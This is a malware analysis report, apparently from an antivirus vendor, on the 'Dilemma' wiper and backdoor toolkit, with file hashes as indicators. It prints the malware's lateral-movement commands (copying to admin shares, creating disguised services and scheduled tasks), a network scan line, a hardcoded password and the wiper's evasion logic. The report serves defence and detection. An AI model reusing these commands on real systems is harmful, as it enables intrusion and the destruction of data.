Updated on 03-13-2022:
On 03-11-2022 AFTA Center released a warning related to this set of malware as “detecting a new malware in infrastructure” and called it the “Dilemma” which is the same HackTool.Win32.QWipe and you can read its complete analysis as follows.
Please refer to AFTA Center to read the report.
Technical details
1.1 Modules and malware operation sequences
This malware includes many modules, including executable programs and various scripts, each of which has its small task.
The following is a list of malware files with a brief description of how they work.
| File Name | Description |
| HackTool.Win32.PS_Backdoor | the malware Backdoor file is used to execute the hacker’s command and to download/upload arbitrary files |
| HackTool.Win32.QWipe | Wiping Hard-disk data, changing users’ passwords, deleting Windows backup files, etc. |
| wint.bat | Run the scheduler task to run the msdskint.exe file service |
| Lastfile | The contents of the last corrupted file path |
| HackTool.Win32.HttpBackdoor | Act as HttpBackdoor to create a backdoor in the system and execute the intruder’s commands |
| HackTool.Win32.HttpCallBackService | The intruder’s HttpCallBackService tool to establish a connection with C&C servers |
| HackTool.Win32.PS_Distributor | Hacker’s HttpBackdoor tool distribution file |
Table 1 – Summary of malware payload performance
1.1.1 Description of HackTool.Win32.PS_Backdoor threat performance
This malware acts as a backdoor for the hacker. This file makes the remote command execution from the server possible for the hacker. Other features of this malware are it can download/upload arbitrary files. The whole send/receive data by this file happens through TLS packets.
This malware creates 4 execution sockets along with a local address on the victim’s system and then eavesdropping the data on these sockets. If receiving data, it will send them to its remote server using the below address. The malware uses port 8443 to connect with its remote server. This port like port 443 uses the TLS encryption method to transact packets. Currently, this server is offline.
When using port 443, there’s no need to mention the port beside the domain address. But when using port 8443 it is necessary to note the port beside the domain address.
In the following, we will explain each socket’s performance.
| Socket No. | Performance |
| 127.0.0.1:62563 | For receiving each TLS packet on this socket, the malware creates a cmd.exe process by recalling the main_startshell function and when executing, it will end the cmd.exe process and once again eavesdrop. It seems like the malware uses this socket only to receive execution commands. |
| 127.0.0.1:36774 | Receiving HTTP packets under TLS and recalling the main_starthttp function to download/upload files. |
| 49151:[::] 0.0.0.0:49151 | Establishing a proxy server between this socket and the hacker’s remote server |
Table 2- The malware sockets and their performance
1.1.2 wint.bat file performance
This file executes the malware Wiper service. This is a service with a fake Windows Taks Scheduler name which you can see they’ve used the word Taks instead of Task. This Wiper file has been seen on different systems through the following routes as msdskint.exe and Dilemma.exe:
c:\windows\ccmcache\6\msdskint.exe
c:\programdata\pcmr\msdskint.exe
1.1.3 HackTool.Win32.QWipe performance
This file is the Wiper that the hacker created which can receive arguments. If there was no entry argument, the file has also contain predefined arguments which use them during execution.
The hacker packed this file using the “Eziriz.NET Reactor” tool to obfuscate the malware codes from the analyzer and the antivirus. In the following, you can read how it acts after being decoded.
In the following table, you can view a list of receivable arguments by the Wiper malware with their performance.
| Entry arguments | Performance |
| -wipe-exclude | The routes which are placed after this argument will be added to the malware exclusion list so they can be untouched during Wiping activity. |
| -light-wipe | Times when malware buffer has been written on the victim’s system to execute wiping activity. |
| -sessions | It restarts and logs off all system active Sessions |
| -delete-users | Deletes all entered user’s accounts with the argument itself |
| -shadows | Wipes all system backup versions |
| -start-iis | Restarts the iis service |
| -config | Undefined activities |
| -processes | Ends all entered process with the argument itself |
| Logs- | The malware wipes all OS and Event Viewer logs using Windows wevtutil.exe and Enum |
| -delete | Finally, it removes all wiped files from the system, if enters this argument (it will execute Win32Native.DeleteFile file) |
| -break-users | Changes the victim’s system passwords |
| -wipe-only | Wipes only the files on the entered routes |
| -purge | It’s the complete removal and its wiping procedure is different than the normal procedure. |
| -passwords | Undefined activities |
| -wipe-all | Wiping all system drives |
| -stop-iis | Stoping iis service |
Table 3- HackTool.Win32.QWipe malware performance
- -break.users argument
If this is the entry argument and a user is specified, the malware sets a password for each defined account. This password is the permanent “S7Y1a82R!” string.
Figure 1- changing user’s password by the malware
- -purge argument
This argument is being used when the malware is wiping files. In general, the value that is considered for wiping data is a 200-byte buffer that its contents are created randomly through an algorithm.
If a purge argument is entered, a full_purge value will be set inside the malware code. This Item is the complete wiping of the malware. In this situation, the wiping procedure is that it writes the buffer value on the file until reaches the end of the file.
Also, the malware contains a purgeExtensions list in its codes, including hackers’ candidate suffixes. So if a file is about to be wiped then it must have one of the following suffixes and the wiping procedure will be the same as the full_purge procedure.
Figure 2- Candidate suffixes
In addition to the above list, there are other strings inside the malware file that can be used as candidate suffixes which are as follows:
.accdb, .cdx, .dmp, .js, .pnf, .rom, .tif, .wmdb, .acl, .cfg, .doc, .hlp, .png, .rpt, .tiff, .wmv, .acm, .chk, .docx, .hpi, .lnk, .pps, .rsp, .tlb, .xdr, .amr, .com, .dot, .ppt, .sam, .tmp, .xls, .apln, .cpl, .drv, .pptx, .scp, .tsp, .xlsx, .asp, .cpx, .dwg, .hxx, .m4a, .pro, .scr, .avi, .dat, .eml, .ico, .mid, .psd, .sdb, .xsd, .ax, .db, .nls, .rar, .sig, .wab, .zip, .bak, .dbf, .ext, .one, .wab~, .bin, .dbx, .fdb, .jar, .pdf, .rdf, .sqlite, .wav, .bmp, .dll, .gif, .jpg, .pip, .resources, .theme, .wma, .config, .mxf, .mp3, .mp4, .cs, .vb, .tib, .aspx, .pem, .crt, .msg, .mail, .enc, .msi, .cab, .plb, .plt
- -wipe-all argument
If this is the entry argument, then the whole system’s active drives will be restored inside a list. Then all dive information will be wiped.
Three files will be excluded when wiping information:
- default.htm
- index.htm
- death_to_raisi.exe
In the malware wiping procedure, when there is no set full_purge value nor file suffixes that are among candidate suffixes is that it firstly will write a value of 200 bytes from the defined buffer on the zero offset on the file. Then, the whole file size will be divided into 1024. Then it will restore this value inside the num4.
If there will be no entered value for the light_wipe argument, the minimum amount between light_wipe and num4 will be calculated and written on the num4.
Then it will distance 1024 bytes (0X40) from the offset on the num4 and then write that again on the next 200 bytes as well, so it will continue this pattern till the end of the file. In the end, it will create the lastfile2 file inside the wiped folder and writes the file route in the mentioned folder.
as we have mentioned before, the malware Wiper file if cannot receive any argument as an entry will use its predefined arguments. If this file is executed under the service then it will contain the following default arguments:
Figure 3- string list as the entry arguments
According to these arguments, this service will act as follows:
1- The -light-wipe value will be equal to 3. It means the data wiping buffer has been written 3 times on each file.
2- the iis service will be stopped.
3- it will delete all Windows Event Viewer logs.
4- It will delete all backup files
5- the -processes value will be equal to *sql. It means it ends all processes containing SQL strings in their names.
6- All active drive data except Exclude routs will be wiped
7- The excluded routes by the hacker are as follows:
"C:\Windows" "C:\$Recycle.Bin" "C:\$WinREAgent" "C:\Config.Msi" "C:\MSOCache" "C:\Recovery" "C:\Program Files\IBM\*" "C:\System Volume Information" "C:\Program Files\dotnet" "C:\Program Files (x86)\dotnet*" "C:\Program Files\Symantec*" "C:\Program Files (x86)\Symantec*" "C:\Program Files (x86)\Padvish*" "C:\Program Files\Kaspersky*" "C:\Program Files (x86)\Kaspersky*" "C:\Program Files\Microsoft*" "C:\Program Files (x86)\Microsoft*" "C:\Program Files\Windows*" "C:\Program Files (x86)\Windows*"
There’s a function inside the malware commands that shows the hacker was sensitive to Padvish antivirus. For instance, as you can see the Figure 4, the malware monitored the list of executing processes on the victim’s system. If among processes, Padvish or its UI is executing, instead of executing the default functions for wiping information, the malware tries to use another method to wipe data.
It seems that the reason behind changing tactics from the malware is to evade the Padvish behavioral detection system which is detected the malware wiping method and immediately prevents it, but Padvish has also detected and prevented the other methods of the malware.
In the second method, the malware tries to create a temporary bat file (tmp.bat) for each system file and creates two temporary scheduling tasks with system permission for these files.
figure 4- The malware’s searching for Padvish antivirus UI and service
figure 5- the malware changed its wiping method after finding the Padvish antivirus service
In the following, you can view an example of the created bat file
Figure 6- an example of created bat file to wipe data
As it is obvious from the bat file contents, firstly, the malware creates a file containing a null value equal to the file that was supposed to be wiped ( 3072 bytes) with the .qipe extension using Windows fsutil tool. Then it wanted to replace the original file with this fake file.
The hacker knew that Padvish could prevent this malware from wiping data, so it tried to use another method- using a system standard tool- to wipe data. nevertheless, the Padvish anti-ransomware component (Anti-Crypto) successfully prevent this attack.
There are commands inside the malware codes that indicate this malware can restore the run-time software logs when wiping as follows:
There are strings such as “– Excluded” ، “– Skipped” ، “BreakSelectedUsers” ، “DeleteSelectedUsers” ، “KillProcesses”, etc. This log ends with the “Finished on” string and records the end time when wiping is done. However, seems like the hacker needs not restore the log using the Wiper file because it did not consider a code for the Output function that has the duty of printing the result.
1.1.4 HackTool.Win32. HttpCallbackService performance
The hacker uses this file as a tool for downloading/uploading files and executing arbitrary commands on the victim’s system. You can read the explanation of this performance below.
This file receives the information related to the malware server from its configuration file or the input.
In the following table you can see the commands that are supported by this tool:
| Command | Performance |
| Download/Upload | Encrypted downloading from the victim’s site or uploading files to the malware server and vice versa |
| stay-alive | activating isStayAliveMode flag |
| cool-down | Deactivating (for 1 minute) isStayAliveMode flag |
| Default performance | Executing the hacker’s commands through the command line |
Tabel 4- HttpCallbackService too command list
In the following figures, you can see the complete scheme of the malware and its receivable queries.
figure 7- HttpCallbackService malware function
figure 8- list of strings and queries
First, the malware reads the hacker’s server address from the configuration file and according to the configuration file contents, the malware considers the following queries.
| queries | the end string of the configuration file |
| =m? | .aspx |
| =m? | .php |
| =m | / |
| =m/ | default |
Table 5- strings and queries
The procedure of receiving commands from the server, for example, the malware server downloading a file from the client is that after connecting to the server, the contents of the file with the name of =m will be recalled from the server. Then after recovering the specified file route, the file will be encrypted using the base64 algorithm and will be sent to the server.
Figure 9- Contents of the command file on the server-side
Figure 10- Encoding file using the malware and sending it to the malware server
If the =, the file contains a command, this command will b executed by cmd.exe
Figure 11- executing commands by cmd.exe
The malware executes its performance results inside a .out file on the victim’s system.
Figure 12- The malware HttpCallbackService output log
1.1.5 HackTool.Win32.HttpBackdoor performance
This file acts as an HTTP service for the hacker. The information related to the hacker’s arbitrary commands will be restored in two files: uhsvc.exe.start and uhscv.exe.ini. The name of this file was different in separate attacks.
This service which is registered as Microsoft Update Health Host inside the system contains commands to download/upload files and also can connect to SQL database and send the results to the malicious server and manipulate local files. Different versions of the httpservice have been found: 0.1.3vXH and 0.1.4vXH. These versions are not different in performance and accept similar commands.
This file-like a hacker’s Wiper file packed using the “Eziriz .NET Reactor” tool. Additionally, in the malware configuration file, there are other commands as follows.
| Command | Performance |
| ipcofig/all | Recovering network card IP settings |
| whoami/all | Recovering information related to username, user-group, permissions, and accesses |
| systeminfo | Total system information such as type of the OS, physical and virtual storage space, domain, network card, etc |
| tasklist | List of current processes |
| wmic logicaldisk get name | Names of the partitions of the disk |
| net user | User names of the current system |
| dir c:\users | Displaying information related to files inside the c:\users |
| net sessions | List of the current remote communications |
| net view/all | List of the current shared sources |
| net share | List of shared drives and folders |
| route print | information related to Route tables |
| netstat-aon | Communication table related to active ports |
| ping 8.8.8.8 -n 2 | Checking the connection of the current system to the Internet |
Table 6- Used commands inside the HttpBackdoor tool configuration file
The following results are attained after decoding according to the viewed issues:
1- The malware creates a tcpListener inside the victim’s system after is executed under the service. Then, we will explain one of the malware versions that use port 9399. In samples that are found from uhscv.exe.start, the hacker authorized the entry packets to port 9399 ( in some cases port 9396) in the firewall from out of the victim’s system network.
figure 13- uhsvc.exe.start file contents
2- The malware can receive and execute different commands from the hacker’s server. The malware executes these commands using the cmd tool.
Figure 14- Executing hacker’s arbitrary commands using shell
3- Using sqlConnection and sqlCommand functions to execute different queries on the SQL database
4- Creating file
Figure 15- Creating file by the hacker using malware
5- The malware can zip or unzip the directories contents, download/upload, and delete the hacker’s desired files, if necessary. This malware uses the IonicZip library to compress files.
Figure 16- Compressing/ decompressing and removing files
Figure 17- Manipulating directories contents
6- Capability to receive server desired proxies to connect with the server using =b and =p commands
Figure 18- Commands related to proxy
Figure 19- Setting proxy
7- Possibility of displaying the malware version for the hacker (the hacker used multiple versions of HackTool.Win32.HttpBackdoor to implement his operation)
Figure 20- Displaying the malware version
8- Possibility of the current malware file route (“c:\programdata\pcmr\uhsvc.exe” is the malware route).
9- Possibility of creating log files and sending them to show the possible errors to the hacker
Figure 21- Creating a log file
Figure 22- Log file
In the following table, you can see the operation that is supported by the malware:
| Command | Performance |
| a_1=s | Shellexecute with #zip support |
| a_1=c | Run SQL commands |
| a_1=i1 | View output and error logs and delete them |
| a_1=i2 | Delete output and error logs |
| a_1=i | Run cmd interactively |
| Cmd= | Shellexecute |
| W_i | Show Malware path |
| V_i | Show Malware Version |
| P=OR b= | Act as a proxy and forward connection to another website/infected node |
| M=afe=1 |
Write any file
|
| Con= | Run SQL commands |
| Prt= | File Manager (Browse directories, Download/Upload Files,…) |
| other | Read/Write based on GET |
Table 7- Malware web service commands
1.1.6 HackTool.Win32.PS_Distributor Performance
This file act as the distributor tool for the hacker. It has to establish connections with network clients and create and establish hackers’ desired service and scheduled tasks. This file performs distributing tasks on the network.
Figure 23- Starting distributor operation of the malware
This file use Share and “net use” command for its operation. As you can see in the above figure, this file contains a default username and password to connect with the clients:
|
Username : TicketUser |
Additionally, this file can receive information such as username, password, and share folder route as an entry argument. Also, it can receive the list of its desired IP list from the distribiutor.ini.
The malware will copy the Httpservice tool as follows, after connecting with its desired clients:
|
“copy /y c:\\windows\\msunify4.exe \\\\” + ip + \\c$\\windows\\msedgeupdate.exe “copy /y c:\\windows\\msunify.start \\\\” + ip + \\c$\\windows\\msedgeupdate.exe.start |
As you can see from the above commands, HackTool.Win32.HttpBackdoor tool named msunify4.exe exists in the current system. This file is copied into the destination system by the name of msedgeupdate.exe. msedgeupdate.exe file which is equal to msunify. the start is the configuration file of the above tool.
Figure 24- Malware connecting network clients
Then the malware will create the following service:
|
“sc \\\\” + ip + ” create \”Microsoft Edge Update Service (edgeupdatel)\” binpath= \”c:\\windows\\msedgeupdate.exe\” start= auto” “sc \\\\” + ip + ” start \”Microsoft Edge Update Service (edgeupdatel)\”” |
As you can see, a Microsoft Edge Update Service (edgeupdatel) service is created and executed inside the client for the msedgeupdate.exe file (HackTool.Win32.HttpBackdoor tool).
Figure 25- Creating and executing service on the clients
Then, the malware will create a scheduled task to execute the desired tool inside the clients.
|
“copy c:\\windows\\msunify.css \\\\” + ip + \\c$\\Users\\Public\\CreateService.bat “schtasks /create /S {0} /tn \”Backup checks\” /XML c:\\windows\\msunify4.xml /U \”{1}\” /P \”{2}\” /F” “schtasks /run /S {0} /tn \”Backup checks\” /U \”{1}\” /P \”{2}\”” |
The above commands show that the malware is copied a msunify.css file from the current system named CreateService.bat inside the client and on the c$\\Users\Public\\. This file has to extract Nmap.exe to detect any security holes (flaws) in the network configurations. After recovering data, it will restore them inside the file named pse200.tmp. The following command shows the CreateService.bat file.
| c:\windows\temp\nmp\nmap.exe -sV 200.200.0.0/16 -oN C:\windows\temp\pse200.tmp |
Finally, the HackTool.Win32.PS_Distributor tool will create a scheduled task named Backup Checks for the file msunify4.xml.
Figure 26- creating a scheduled task by HackTool.Win32.PS_Distributor
2. How to encounter this malware
All detected versions and types of this malware detected by Padvish Antivirus as HackTool.Win32.HTTPbackdoor, HackTool.Win32.PS_Backdoor, HackTool.Win32.PS_Distributor , HackTool.Win32.HTTPCallBackService and Trojan.Win32.QWipe.
Additionally, the unique features of Padvish Data Protection with detecting the malware Wipe performance, preventing any data tampering, and putting an end to the malware execution.
3. Indicator of Compromise (IOC)
| File name | MD5 |
|
uhsvc.exe cbsvc.exe msunify.exe msunify4.exe msedgeupdate.exe |
466832ef3f81f1cc37466be9e1b7c4d2 9fbab064ec583f80dc15e1abc2ebcad3 2529ed634df912d95d52be717560b0b6 cc97e34cf19f56263abd0f89e907cf7a 66e6d3b03613074f38b2a6acff8e8229 94354ecf588835cea2352b873211290e af029e3168e27394020b3f4315b2419b 2c1e86a5c5c5ad19d64baa66e78af6f1 e633f5ce289cdcbdee93b7c02178fa35 4cc3665c4fb23ace6b0f9b396c66f8e6 987a94bdce7f9d50fc0a30f2b10189f6 1a773e123469ea5a22fd3c21b0de56e9 c85af99a8c3bcb5826b9f938ba14d538 |
|
uhsvc.exe.start msunify.start msedgeupdate.exe.start |
381d8239561c3714c1b71f0c2df4f57e 798754303e774a09e5b0e7eff424fd7d |
|
uhsvc.exe.start msunify.start msedgeupdate.exe.start |
381d8239561c3714c1b71f0c2df4f57e 798754303e774a09e5b0e7eff424fd7d |
|
Msunify.css MSUnifySvc.bat |
eb08b4c7ecc25053e5fb23c200e7734b ff2253be230bb20fc68c3a1ad1107c72 |
|
wdisvc.exe spoolsvc.exe edgeupdatel.exe edgeupdaten.exe
|
0ff024b1f42104ff0e9b22c38f293ad4 |
|
costura.ini |
6cbc6bcc647bd8a8afb8384e95bc2fa1 |
| CDPSvc.bat
|
dafb3f2bce39562a68e6bd4176af6d86 |
| SpoolService.bat |
beb00ea7a94fff2ce321a0e9377750ad |
| CreateService.bat |
03c3c225122414a94f90b2aedee490e9 |
| dao.exe |
6319dfec18c53bfcd28cda698f03bd55 |
|
msdskint.exe Dilemma.exe |
13e7caebf00dd2315885e1f47030eb3c 6d806a5b0390262b5ef4687ba10c540c |
| Distributor.exe
|
29841e0069749e1255269cdf4cf6e965 |
| Distributor.ini |
2ee8f6d4853c59c2462ff0b71b455719 |
|
wint.bat |
0aa3b91d584803a39250742b69173841 |